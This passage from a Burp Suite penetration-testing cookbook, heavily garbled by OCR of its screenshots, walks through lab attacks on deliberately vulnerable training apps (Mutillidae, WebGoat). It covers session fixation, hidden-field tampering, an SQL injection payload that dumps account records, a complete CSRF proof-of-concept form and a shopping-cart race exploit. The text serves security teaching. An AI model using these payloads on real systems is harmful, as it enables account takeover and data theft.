dmin.phpéusername=épassword=user-info-php-subnmit-button=ViewtAccount+Details 
acopendivids=swingset ,jotto,phpbb2,redmine; acgroupswithpersist=nada 


3. Right-click the PHPSESSID parameter and send the request to Comparer: 


Extender 


an ==> 


GET /mutillidae/index.php?page=login.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefo 
Accept: text/html, application/xhtmltxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-U5,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //192.168.56.101/mutillidae/index.php?p} Send to Spider 
Cookie: showhints=1; PHPSESSID= 


Do an active scan 
Connection: close 
Upgrade-Insecure-Requests: 1 Do a passive scan 
Cache-Control: max-age=0 Send to Intruder Ciril 
Send to Repeater CtriR 


Send to Sequencer 


4. Return to the login screen (click Login/Register from the top menu), and, 
this time, log in under the username ed and the password pentest. 

5. After logging in, switch to Burp's Proxy HTTP history tab. Look for the 
POST request showing your login (for example, the 302 HTTP status code) 
as well as the immediate GET request following the PosT. Note the 
PHPSESSID assigned after login. Right-click and send this request to 


Comparer. 

6. Switch to Burp's Comparer. The appropriate requests should already be 
highlighted for you. Click the Words button in the bottom right-hand 
corner: 


Target | Proxy | Spider | Scanner | intruder | Repeater | Sequencer Decoder | comparer | Extender | Project options | User options | Alerts 


Comparer (2) 
This function lets you do a word- or byte-level comparison between different data. You can load, paste, or send data here from other tools and then select the comparison you want to perform. 


| Select item 1 


| [a LE E as Paste | 


Data 
GET /mutillidae/index. php?page=login.php HTTP/1. 1Host: 192. 168.56.101User-Agent: Mozilla/S.0 (Windows NT 10.0; Win64; x6. 


A popup shows a detailed comparison of the differences between the two 
requests. Note the value of PHPSESSID does not change between the 
unauthenticated session (on the left) and the authenticated session (on the 
right). This means the application has a session fixation vulnerability: 


= 
Length: 620 © Text O Hex Length: 679 @ Text O Hex 
GER imutcocindex php?page=iogin php HTTPI1.1 BSE smutiscacindex php?page=login. php HTTP/1.1 
Host: 192.168.56.101 Host 192.168.56.101 
User-Agent Moziia/S.0 (Windows NT 10.0; Win64; x64: v61 0) Gecko/20100101 Firefox/61.0 User-Agent Mozita/S.0 (Windows NT 10.0; Win64; x64; rv61.0) Gecko/20100101 Firefox61.0 
Accept: text/html appication/xhtmi-xmi appication/ami.q=0 9.°/".q=0.8 Accept text/html appication/xhtmi-xmi appication/xmt.g=0 .9,*/*.q=0.8 
Accept-Language en-US en.q=0 $ Accept-Language: en-US en:q=0 S 
Accept-Encoding: gzip, defiate Accept-Encoding: gzip, defiste 
Referer: Referer: http //192 1638.56.10 1/mutiidae/ndex php?page=- Bg php 


hitp#/192.168.56.10; 
Cookie. showhintss| 
Connection: cose 

Upgrade-nsecure-Requests: 1 


PHPSESSD=/ z mkedv44024teod3; copendivids=s wingset jotto,phpbb2,redmine, acgroupswthpersistenada 


Cooke: showhints= $ PHPSESSD=08néptghnniedv44024teod3 Jacopendivids=s wingset jotto phpbb2,redmine; acgroupswithpersist=nada 
Connectior 


Upgrsde-nsecure-Requests: 1 


Key Mosta DUR Acces D Sync views 


How it works... 


In this recipe, we examined how the PHPSESSID value assigned to an 
unauthenticated user remained constant even after authentication. This is a 
security vulnerability allowing for the session fixation attack. 


Testing for exposed session variables 


Session variables such as tokens, cookies, or hidden form fields are used by 
application developers to send data between the client and the server. Since these 
variables are exposed on the client-side, an attacker can manipulate them in an 
attempt to gain access to unauthorized data or to capture sensitive information. 


Burp's Proxy option provides a feature to enhance the visibility of so-called 
hidden form fields. This feature allows web application penetration testers to 
determine the level of the sensitivity of data held in these variables. Likewise, a 
pentester can determine whether the manipulation of these values produces a 
different behavior in the application. 


Getting ready 


Using the OWASP Mutillidae II application and Burp's Proxy's Unhide hidden 
form fields feature, we'll determine whether manipulation of a hidden form field 
value results in gaining access to unauthorized data. 


How to do it... 


1. Switch to Burp's Proxy tab, scroll down to the Response Modification 
section, and check the boxes for Unhide hidden form fields and 
Prominently highlight unhidden fields: 


@ Response Modification 


| These settings are used to perform automatic modification of responses. 


(#7) Unhide hidden form fields 
W) Prominently highlight unhidden fields 
[C] Enable disabled form fields 
LJ Remove input field length limits 
(C Remove JavaScript form validation 
C Remove all JavaScript 
C] Remove <object> tags 
C Convert HTTPS links to HTTP 


__| Remove secure flag from cookies 


2. Navigate to the User Info page. OWASP 2013 | A1 — Injection (SQL) | 
SQLi — Extract Data | User Info (SQL): 


@« OWASP Mutillidae Il: Web Pwn in 


Version: 2.6.24 Security Level: 0(Hosed) Hints: Enabled (1 - 5cr1 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL 


OWASP 2013 A1 - Injection (SQL) >| SQLi - Extract Data >| User Info (SQL) 


3. Note the hidden form fields now prominently displayed on the page: 


è% OWASP Mutillidae Il: Web Pwn in Mass Production 


Version: 2.6.24 Security Level: 0 (Hosed) Hints: Enabled (1-5criptKidd1e) Not Logged In 


Home Login/Register Toggle Hints Show Popup Hints Toggle Security Enforce SSL ResetDB ViewLog View Captured Data 


OWASP 2013 p 


User Lookup (SQL 


OWASP 2007 p S Back 9 Help Me! 


Web Services 
Hints 
HTML 5 
| A Switch to SOAP Web Service version Switch to XPath version 
Documentation l LJ 


Resources 


Hidden field [page] 


F Please enter username and password 
Getting Started: to view account details 


Project Whitepaper 
Name 
$ Password 
View Account Details 


4. Let's try to manipulate the value shown, user -info . php, by changing it to 
admin. php and see how the application reacts. Modify the user -info.php 
to admin. php within the Hidden field [page] textbox: 


| User Lookup (SQL) 


A Back Q Help Me! 


f = Hints 


AJAX Switch to SOAP Web Service version XML Switch to XPath version 


> 


Hidden field [page] farina 


5. Hit the Enter key after making the change. You should now see a new page 
loaded showing PHP Server Configuration information: 


Secret PHP Server Configuration Page 


Back @ Help Me! 


Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 
2010 i686 


Build Date Apr 17 2015 15:01:49 
Server APL Apache 2.0 Handler 


Virtual Directory [disabled 

Support 

Configuration File | /etc/phpS/apache2 

(php.ini) Path 

Loaded /owaspbwa/owaspbwa-svn/etc/php5/apache2/php..ini 
Configuration File 

Scan this dir for /etc/phpS/apache2/conf.d 

additional .ini files 


Additional .ini files | /etc/php5/apache2/conf.d/curl.ini, /etc/php5/apache2/conf.d/gd.ini, /etc/php5/apache2 
parsed /conf.d/mcrypt.ini, /etc/php5/apache2/conf.d/mysql.ini, /etc/php5/apache2/conf.d 
/mysqli.ini, /etc/php5/apache2/conf.d/pdo..ini, /etc/php5/apache2/conf.d/pdo_mysq ini 


PHP API 20090626 
PHP Extension 20090626 
Zend Extension 220090626 


Zend Extension API220090626,NTS 


How it works... 


As seen in this recipe, there isn't anything hidden about hidden form fields. As 
penetration testers, we should examine and manipulate these values, to 
determine whether sensitive information is, inadvertently, exposed or whether 
we can change the behavior of the application from what is expected, based on 
our role and authentication status. In the case of this recipe, we were not even 
logged into the application. We manipulated the hidden form field labeled page 
to access a page containing fingerprinting information. Access to such 
information should be protected from unauthenticated users. 


Testing for Cross-Site Request 
Forgery 


Cross-Site Request Forgery (CSRF) is an attack that rides on an authenticated 
user's session to allow an attacker to force the user to execute unwanted actions 
on the attacker's behalf. The initial lure for this attack can be a phishing email or 
a malicious link executing through a cross-site scripting vulnerability found on 
the victim's website. CSRF exploitation may lead to a data breach or even a full 
compromise of the web application. 


Getting ready 


Using the OWASP Mutillidae II application registration form, determine whether 
a CSRF attack is possible within the same browser (a different tab) while an 
authenticated user is logged into the application. 


How to do it... 


To level set this recipe, let's first baseline the current number of records in the 
account table and perform SQL Injection to see this: 


1. Navigate to the User Info page: OWASP 2013 | A1 — Injection (SQL) | 
SQLi — Extract Data | User Info (SQL). 


2. At the username prompt, type in a SQL Injection payload to dump the entire 
account table contents. The payload is ' or 1=1-- <space> (tick or 1 
equals 1 dash dash space). Then press the View Account Details button. 


3. Remember to include the space after the two dashes, since this is a MySQL 
database; otherwise, the payload will not work: 


User Lookup (SQL) 


L) Switch to XPath version 
Please enter username and password 
to view account details 
Password 


View Account Details 


4. When performed correctly, a message displays that there are 24 records 
found in the database for users. The data shown following the message 
reveals the usernames, passwords, and signature strings of all 24 accounts. 
Only two account details are shown here as a sample: 


Results for ™ or 1=1 --|".24 records ound. 


Username=admin 
Password=admin 
Signature=g0t r0Ot? 


Username=adrian 
Password=somepassword 
Signature=Zombie Films Rock! 


We confirmed 24 records currently exist in the accounts table of the 
database. 


5. Now, return to the login screen (click Login/Register from the top menu) 
and select the link Please register here. 

6. After clicking the Please register here link, you are presented with a 
registration form. 

7. Fill out the form to create a tester account. Type in the Username as tester, 
the Password as tester, and the Signature as This is a tester account: 


Username 


Password Password Generator 


Confirm Password |eeeeee 
This is a tester account 
Signature 


8. After clicking the Create Account button, you should receive a green 
banner confirming the account was created: 


9. Return to the User Info page: OWASP 2013| A1 — Injection (SQL) | SQLi 


— Extract Data | User Info (SQL). 
10. Perform the SQL Injection attack again and verify that you can now see 25 
rows in the account table, instead of the previous count of 24: 


Results for ™ or 1=1-- ".25 records found. 


11. Switch to Burp's Proxy HTTP history tab and view the PosT request that 
created the account for the tester. 


12. Studying this POST request shows the POST action (register . php) and the 
body data required to perform the action, in this case, username, password, 
confirm_password, and my_signature. Also notice there is no CSRF-token 
used. CSRF-tokens are placed within web forms to protect against the very 
attack we are about to perform. Let's proceed. 


13. Right-click the POST request and click on Send to Repeater: 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


Intercept WebSockets history | Options 


Filter: Hiding CSS, image and general binary content 


| URL Params | Edited 


| Status 


à| Host | Method Length 


| MIME type 
49863 HTM 


HTML 


| Exten 


php 


egister.php v 200 


Request [ Response | 
Raw l Params | Headers | Hex 


POST /mutillidae/index.php?page=register.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 à 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Send to Spider 
Accept-Language: en-US,en;q=0.5 Do an active scan 
Accept-Encoding: gzip, deflate Do a passive scan 
Referer: http: //192.168.56.101/mutillidae/index.php?page=register.php 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 147 Send to Repeater Ctr+R 
Cookie: ehoehint este PHPSESSID=O08népt qhnrnk3edv44ol4teod3; acopendivids=swingset,jotto,phpbb2,y Send to Sequencer 

Connection: close 
Upgrade-Insecure-Requests: 1 


Send to Intruder Ctr 


Send to Comparer 
Send to Decoder 


csr f-token=4username=testerápassword=testeráconfirm password=testerémy signature=Thististattest x 
aed Show response in browser 


14. If you're using Burp Professional, right-click select Engagement tools | 
Generate CSRF PoC: 


— 


Go Cancel < |v > 


Request Response 


“mma Raw 
a 


POST /mutillidae/index.php?page=register.php HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; r r 
Firefox/&E1.0 Send to Spider 
Accept: text/html,application/xhtultxml,application/xml; Do an active scan 
Accept-Language: en-US,en;q=0.5 Send to Intruder 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?paga Send to Repeater 
Content-Type: application/x-www-form-urlencoded Send to Sequencer 
Content-Length: 147 
Cookie: showhints=1; PHPSESSID=08né6ptqhnrnk3edv44o074teod 
acopendivids=swingset,jotto,phpbb2,redmine; acgroupswit Send to Decoder 
Connection: close 
Upgrade-Insecure-Requests: 1 


Send to Comparer 


Request in browser 


Engagement tools : 
os Find references 


esr f-tolren=ausername=testerépassword=testeréconfirm pass 


Change request method 
ististattestertaccountéregister-php-submit-button=Create 


Change body encoding 
Copy URL 


Discover content 
Schedule task 


Generate CSRF PoC 


15. Upon clicking this feature, a pop-up box generates the same form used on 
the registration page but without any CSRF token protection: 


E CSR PoC generator =- O X 


Request to: http://192.168.56.101 


POST /mutillidae/index.php?page=register.php HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Geeko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtultxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-U5,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/mutillidae/index.php?page=register. php 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 147 

Cookie: showhints=1; PHPSESSID=08néptqhnrnk3edv44o24teod3; 
acopendivids=swingset ,jotto,phphh2,redmine; acqroupswithpersist=nada 


(2) =a (+) B Type a search term 0 matches 


a [+ | [>| Type a search term 0 matches 


16. If you are using Burp Community, you can easily recreate the CSRF PoC 
form by viewing the source code of the registration page: 


Register for an Account 


Version of this Page 


Please choose your username, password and signature 


Username 
Password Password Generator 


€ > ¢ 
Confirm Password | no ee 
Save Page to Pocket 
i i > 
Signature Send Page to Device 


View Background Image 


Create Account View Page Info 
Inspect Element (Q) 


? Take a Screenshot 


17. While viewing the page source, scroll down to the <form> tag section. For 
brevity, the form is recreated next. Insert attacker as a value for the 


username, password, and the signature. Copy the following HTML code 
and save it in a file entitled csrf.htm1: 


<html> 
<body> 
<script>history.pushState('', '', '/')</script> 
<form action="http://192.168.56.101/mutillidae/index.php? 
page=register.php" method="POST"> 
<input type="hidden" name="csrf-token" value="" /> 
<input type="hidden" name="username" value="attacker" 
/> 


<input type="hidden" name="password" value="attacker" 
/> 


<input type="hidden" name="confirm_password" 
value="attacker" 


/> <input type="hidden" name="my_signature" 
value="attacker account" /> 

<input type="hidden" name="register-php-submit-button" 
value="Create Account" /> 

<input type="Submit" value="Submit request" /> 

</form> 
</body> 

</html> 


18. Now, return to the login screen (click Login/Register from the top menu), 
and log in to the application, using the username ed and the password 
pentest. 

19. Open the location on your machine where you saved the csrf.html1 file. 
Drag the file into the browser where ed is authenticated. After you drag the 
file to this browser, csrf.htm1 will appear as a separate tab in the same 
browser: 


csrf.html 


20. For demonstration purposes, there is a Submit request button. However, in 
the wild, a JavaScript function would automatically execute the action of 
creating an account for the attacker. Click the Submit request button: 


192.168.56.101/mutillidae/ir X /C:/Packt/Ch6%20Assessing%20Se: X 


C Q Q) file:///C:/Packt/Ch6 Assessi 


Submit request 


You should receive a confirmation that the attacker account is created: 


| Register for an Account 
Back 2 Help Me! 


Fe ee eS 6 EEE EEE EEE EEE EEE EE EE EEEE EE EE EEEEEEEEEEEEEEEEEEEEESEEEEEEEEEEEEEEEEEE DEES 


0 oe © & & & & & & & SS & SS FS EEE EES EE EEE EEEEEEEEEEEEESEEEEEEEESEEEEEEEEEEEEEEEEEESESEEEESEESEEEEEEEESSESEEE 


21. Switch to Burp's Proxy | HTTP history tab and find the maliciously 
executed POST used to create the account for the attacker, while riding on 
the authenticated session of ed's: 


POST /wutiLlidae/indew. php?page=reqister.php ATTP/1.1 

Host: 192. 168,$6.10) 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Wine’; x64) rv:61.0) Gecko /0L00101 Tire fox/él.0 
Accept: text/html application/xhtultxml, application/mal ;qe0.9,*/*; 90.8 

Accept-Language: en-U5,en; a0. 4 

Accept-Incoding: gzip, deflate 

ContentType: applicatlon/a-wev=form=urlencoded 

Content-Length: 145 

Cookie: showhints=1; usernamesed; uid=24; PHPARSSID=00néptainrnk Jedvidożdteod3; acopendividszsvingset, Jotto, phpbb: reduine; acgroupswithpersist=nada 
Connection: close 

Upgrade- Insecure-Dequests: 1 


cart-tokenstusernanesattackertpasswordeattackericonfir passwordeattackerdny signaturesattackertaccoutiregister-php-submit-huttonetreatetAceount 


22. Return to the User Info page: OWASP 2013 | Al — Injection (SQL) | SQLi 
— Extract Data | User Info (SQL), and perform the SQL Injection attack 
again. You will now see 26 rows in the account table instead of the previous 
count of 25: 


Results for ™ or 1=1-- ".26 records found. 


How it works... 


CSRF attacks require an authenticated user session to surreptitiously perform 
actions within the application on behalf of the attacker. In this case, an attacker 
rides on ed's session to re-run the registration form, to create an account for the 
attacker. If ed had been an admin, this could have allowed the account role to be 
elevated as well. 


Assessing Business Logic 


In this chapter, we will cover the following recipes: 


Testing business logic data validation 

Unrestricted file upload — bypassing weak validation 
Performing process-timing attacks 

Testing for the circumvention of workflows 
Uploading malicious files — polyglots 


Introduction 


This chapter covers the basics of business logic testing, including an 
explanation of some of the more common tests performed in this area. Web 
penetration testing involves key assessments of business logic to determine how 
well the design of an application performs integrity checks, especially within 
sequential application function steps, and we will be learning how to use Burp to 
perform such tests. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


e OWASP Broken Web Applications (VM) 
e OWASP Mutillidae link 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Testing business logic data validation 


Business logic data validation errors occur due to a lack of server-side checks, 
especially in a sequence of events such as shopping cart checkouts. If design 
flaws, such as thread issues, are present, those flaws may allow an attacker to 
modify or change their shopping cart contents or prices, prior to purchasing 
them, to lower the price paid. 


Getting ready 


Using the OWASP WebGoat application and Burp, we will exploit a business 
logic design flaw, to purchase many large ticket items for a very cheap price. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select the OWASP WebGoat 
application from the initial landing page of the VM. The landing page will 
be configured to an IP address specific to your machine: 


owaspbwa 


OWASP Broken Web Applications Project 


am 


Version 1.2 


This is the VM for the Open Web Application Security Project (OWASP) Broken Web Applications project. It contains many, very vulnerable web 
applications, which are listed below. More information about this project can be found in the project User Guide and Home Page. 


For details about the known vulnerabilities in these applications, see https://sourceforge.net/p/owaspbwa/tickets/?limit=999 &sort=_severitytasc. 


TRAINING APPLICATIONS 


Ê OWASP WebGoat Ê OWASP WebGoat NET 


Oowasp ESAPI Java SwingSet Interactive Oowasp Mutillidae II 
OWASP RailsGoat OWASP Bricks 
Oowasp Security Shepherd Ô chost 

O Magical Code Injection Rainbow Obwarp 


Odamn Vulnerable Web Application 


2. After you click the OWASP WebGoat link, you will be prompted for some 


login credentials. Use these credentials: User Name: guest Password: 
guest. 


3. After authentication, click the Start WebGoat button to access the 
application exercises: 


Thank you for using WebGoat! This program is a demonstration of common web application flaws. The 
exercises are intended to provide hands on experience with application penetration testing techniques. 


The WebGoat project is led by Bruce Mayhew. Please send all comments to Bruce at 
WebGoat@owasp.org. 


OWASP ASPECTISECURITY 


The Open Web Application Security Proj 
nii pa Application Security Experts 
WebGoat Authors 
Bruce Mayhew 
Jeff Williams 
WebGoat Design Team V5.4 Lesson Contributers 
David Anderson Sherif Koussa 
Laurence Casey (Graphics) Yiannis Pavlosoglou 
Rogan Dawes 
Bruce Mayhew 
Special Thanks for V5.4 Documentation Contributers 
Brian Ciomei (Multitude of bug fixes) perei 
To all who have sent comments Sherif Koussa 


Start WebGoat 


4. Click Concurrency | Shopping Cart Concurrency Flaw from the left- 


hand menu: 


Choose another language: English ~ Logout Q 


Shopping Cart Concurrency Flaw 


OWASP WebGoat Ye - | Hints | ShowParams  ShowCookies Lesson Plan Show Java Solution 


Introduction 
General 
Access Control Flaws 
AJAX Security 
Authentication Flaws 
Buffer Overflows 

ode Q j; 


oncurrency 
Thread Safety Problems 
Shopping Cart Concurrency 
Flaw 


Cross-Site Scripting (XSS) 
Improper Error Handling 
Injection Flaws 

Denial of Service 

Insecure Communication 
Insecure Configuration 
Insecure Storage 
Malicious Execution 
Parameter Tampering 
Session Management Flaws 
Web Services 

Admin Functions 
Challenge 


Solution Videos Restart this Lesson 


For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase 
merchandise for a lower price. 


rt 
Shopping Cart Items | Price | Quantity [Subtotal] 
Hitachi - 750GB External Hard Drive $169.00 


Hey ett- reckon - All-in-One Laser $299.00 oo 
rinter 
Sony - Vaio with Intel Centrino $1799.00 
Toshiba - XGA LCD Projector $649.00 lo ë e 


Total: $0.00 


Shopping Ca 


Update Cart 


Purchase 


ASPECT) SECURİTY 


Application Security Experts 


OWASP Foundation | Project WebGoat | Report Bug 


The exercise explains there is a thread issue in the design of the shopping 
cart that will allow us to purchase items at a lower price. Let's exploit the 


design flaw! 


5. Add 1 to the Quantity box for the Sony - Vaio with Intel Centrino 
item. Click the Update Cart button: 


Shopping Cart 


Hitachi - 750GB External Hard Drive $169.00 os $0.00 


Hewlett-Packard - All-in-One Laser $299.00 $0.00 
Printer 


Sony - Vaio with Intel Centrino $1799.00 a $0.00 


Toshiba - XGA LCD Projector $649.00 o | $0.00 


Total: $0.00 
Update Cart 
Purchase 


6. Switch to Burp Proxy | HTTP history tab. Find the cart request, right-click, 
and click Send to Repeater: 


Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts 


Intercept WebSockets history | Options 


Fitter: Hiding CSS, image and general binary content 


POST /WebGoat/attack?Screen=15émenu=800 HTTP/1.1 

Host: 192.168. 56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 Firefox/é1.0 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 101/WebGoat/attack?Screen*15émenu*900 Send to Spider 


Content-Type: application/x-www-form-urlencoded Do an active scan 
Content-Length: 46 

Cookie: JSESSIONID=E12D7ALLF1C365245CDOEL2E60407E2D; acopendivids=swingset, jot 
Authorization: Basic 23V1c¢3Q623V1c30= 

Connection: close 

Upgrade-Insecure-Requests: 1 


Do a passive scan 


OTYL=04OTY2=060TY3=160TY4=04SUBMIT=UpdatetCart Send to Comparer 
Send to Decoder 


7. Inside Burp's Repeater tab, change theQTy3 parameter from 1 to 10: 


Go Cancel || <i" | | Dit 


POST /WebGoat /attack?Screen=l5émenu=$00 HTTP/1.1 

Host: 192.168.56. 101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 
Firefox/61.0 

Accept: text/html, application/xhtultxml application/xml;q=0.9,*/*;q=0.8 
Aecept-Lanquage: en-US, en;q=0.5 

Aecept-Encoding: gzip, deflate 

Referer: http://192. 168.56. 101/WebGoat /attack?Screen=15émenu=800 
Content-Type: application/x-www-form-urlencoded 

Content-Length: 46 

Cookie: JSESSIONID=E12D7A11F1C365245CD0E12660407E2D; 
acopendivids=swingset,jotto phpbb? ,redmine; acgroupswithpersist=nada 
Authorization: Basie Z3Vle3Q6Z3Vle3Q= 

Connection: close 

Upgrade-Insecure-Requests: 1 


QTY1l=0aQTY2=0 


RQTY4=065UBMIT=UpdaterCart 


8. Stay in Burp Repeater, and in the request pane, right-click and select 
Request in browser | In current browser session: 


= 
manne 
| | Cancel | | <| | >it 


Request Response 


in| or [aes || | = 


POST /WebGoat/attack?Screen=L5amenu=800 HITP/1.1 
Host: 192.168. 56.101 

User-Agent: Mozilla/$.0 (Windows NT 10.0; Winé4; x64; rv:61.0) Gecko/20100101 
Firefox/61.0 

Accept: text/html, application/xhtultxml, application/xml;q=0.9,*/*;q=0.8 
Accept-Lanquage: en-US, en;q=0. 5 

Accept-Encoding: gzip, deflate 

Referer: http: //192. 168.56. 101/WebGoat/attack?Screen=1Samenu=800 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 46 

Cookie: JSBSSTONID=BL2D7ALIFLC3ES245CD0RL 2668 
acopendivids=swingset , jotto, phpbb?, redmi Send to Spider 
Authorization: Basic 23Vle3Q623V1¢3Q= 
Connection: close 
Upgrade-Insecure-Requests: 1 


Do an active scan 
Send to Intruder 
Send to Repeater 
Send to Sequencer 
Send to Comparer 
Send to Decoder 


Request in browser > x : 
1 In original session 


Engagement tools 


QTYL=O4QTY2=0¢QTY3=LOGQTY4=04SUBMIT=Upd 


In current browser session 
el 


9. Apop-up displays the modified request. Click the Copy button: 


e 4 
Repeat request in browser X 


To repeat this request in your browser, copy the URL below and paste into a 
browser that is configured to use Burp as its proxy. 


http://burp/repeat/3/wadnz? gxdckpmcugSwO0p0eb0b9jvsxtw 


(C) In future, just copy the URL and don't show this dialog | Close | 


10. Using the same Firefox browser containing the shopping cart, open a new 
tab and paste in the URL that you copied into the clipboard in the previous 


step: 
Ce Q http://burp/repeat/3/wqdnz7gxdckpmcug6wO0p0eb0b9jvsxtw 


11. Press the Enter key to see the request resubmitted with a modified quantity 
of 10: 


2 [iii lilac 


€)>9 CG 0) (@ 192.168.56.101/WebGoat/attack?Screen= 15&menu=800 E -9 W 


Choose another language: English v| Logout Q 
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AJAX Security 
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Code Quality 
Concurrency 
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Flaw Hitachi - 750GB External Hard Drive | $169.00 oe 
Cross-Site Scripting (XSS) z 
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Injection Flaws Printer 
Denial of Service eo r 
insécüre Communication Sony - Vaio with Intel Centrino $1799.00 
Insecure Configuration 


Insecure Storage 
Malicious Execution 


Solution Videos Restart this Lesson 


For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase 
merchandise for a lower price. 


Parameter Tampering Total: $17,990.00 
Session Management Flaws pt roe 
Web Services Update Cart 
Admin Functions 
Challenge 

Purchase 

ASPECT). 
Application Security Experts 


OWASP Foundation | Project WebGoat | Report Bug 


12. Switch to the original tab containing your shopping cart (the cart with the 
original quantity of 1). Click the Purchase button: 


Shopping Cart 


Hitachi - 750GB External Hard Drive $169.00 .o | $0.00 


Hewlett-Packard - All-in-One Laser 


Sinker $299.00 $0.00 
Sony - Vaio with Intel Centrino $1799.00 1 iso.00 
Toshiba - XGA LCD Projector $649.00 a ë jo 


Total: $0.00 


Update Cart 


13. At the next screen, before clicking the Confirm button, switch to the second 
tab, and update the cart again, but this time with our new quantity of 10, and 
click on Update Cart: 


6 x @ Shopping Cart Concurrency Fle X + 


E> @ 192.168.56.101/WebGoat/attack?Screen=15&menu=800 Aw Oy 


Choose another language: English v| Logout @ 


Shopping Cart Concurrency Flaw 


OWASP WebGoat v5.4) 4.00 mo Lesson Plan Show Java 
Introduction ee : 
Ganer Solution Videos Restart this Lesson 
Access Control Flaws 
i reli Fi For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase 
nance lial merchandise for a lower price. 
Buffer Overflows 
Code Quality 
Concurrency 


Thread Safety Problems 


Flaw itachi - 750GB External Hard Drive itachi - 750GB External Hard Drive External Hard Drive $16.00 00 ooo 00 


Cross-Site Scripting (XSS) 

Improper Error Handling Hewlett-Packard - All-in-One Laser $299.00 o 0.00 
Injection Flaws Printer 

obi of Service Sony - Vaio with Intel Centrino $1799.00 0 $17,990.00 
nsecure Communication 

Insecure Configuration i i 

Insecure Storage Toshiba - XGA LCD Projector $649.00 ooo | $0.00 


Malicious Execution 


Parameter Tampering Total: $17,990.00 
Session Management Flaws A 


Web Services Update Cart 


Admin Functions 
Challenge 


Purchase 
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14. Return to the first tab, and click the Confirm button: 


A Shopping Cart Concurrency Fle X 


e> A A 192.168.56.101/WebGoat/attack?Screen=158menu-800 A » Oy 


Choose another language: English v Logout @ 


Shopping Cart Concurrency Flaw 


Introduction 

General 

Access Control Flaws 
AJAX Security 
Authentication Flaws 
Buffer Overflows 
Code Quality 
Concurrency 


Solution Videos Restart this Lesson 


For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase 
merchandise for a lower price. 


Place your order 

Thread Safety Problems - ; 

Shopping Cart Concurrency Shopping Cart Items Price [Quantity] Subtotal 

Flaw Hitachi - 750GB External Hard Drive $169.00 0 [$0.00 
Cross-Site Scripting (XSS) Hewlett-Packard - All-in-One Laser Printer $299.00 Ea $0.00 
Improper Error Handlin FR ; 
injection ai Sony - Vaio with Intel Centrino $1799.00 $1,799.00 
Denial of Service Toshiba - XGA LCD Projector $649.00} 0 ($0.00 


Insecure Communication 

ae Total: $1799.00 
Malicious Execution 

Sol aera debt Flaws Enter your credit card number: 5321 1337 8888 2007 | 
aah Enter your three digit access code: 111 E | 
Challenge 

Cancel 
ASPECT 
Application Security Experts 


OWASP Foundation | Project WebGoat | Report Bug 


Notice we were able to purchase 10 Sony Vaio laptops for the price of 


one! 


Choose another language: English v Logout © 
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Concurrency Flaw 
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Injection Flaws 
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Insecure Configuration 
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Parameter Tampering 
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Shopping Cart Concurrency Flaw 
<| Hints ‘> Show Params Show Cookies Lesson Plan Show Java Solution 


Solution Videos Restart this Lesson 


For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase 
merchandise for a lower price. 


* Thank you for shopping! You have (illegally!) received a 90% discount. Police are on 
the way to your IP address. 
* Congratulations. You have successfully completed this lesson. 


Thank you for your purchase! 
Confirmation number: CONC-88 


Shopping Cart Items | Price |Quantity| Subtotal 
Hitachi - 750GB External Hard Drive $169.00] 0 [$0.00 
Hewlett-Packard - All-in-One Laser Printer $299.00) 0 ($0.00 


Sony - Vaio with Intel Centrino $1799.00 $17,990.00 
Toshiba - XGA LCD Projector $649.00} 0 ($0.00 


Total Amount Charged to Your Credit Card: $1,799.00 


< Return to Store 


ASPECTISECURİTY 
Application Security Experts 


OWASP Foundation | Project WebGoat | Report Bug 


How it works... 


Thread-safety issues can produce unintended results. For many languages, the 
developer's knowledge of how to declare variables and methods as thread-safe is 
imperative. Threads that are not isolated, such as the cart contents shown in this 
recipe, can result in users gaining unintended discounts on products. 


Unrestricted file upload — bypassing 
weak validation 


Many applications allow for files to be uploaded for various reasons. Business 
logic on the server-side must include checking for acceptable files; this is known 
as whitelisting. If such checks are weak or only address one aspect of file 
attributes (for example, file extensions only), attackers can exploit these 
weaknesses and upload unexpected file types that may be executable on the 
server. 


Getting ready 


Using the Damn Vulnerable Web Application (DVWA)application and Burp, 
we will exploit a business logic design flaw in the file upload page. 


How to do it... 


1. Ensure the owaspbwa VM is running. Select DVWA from the initial 
landing page of the VM. The landing page will be configured to an IP 
address specific to your machine. 

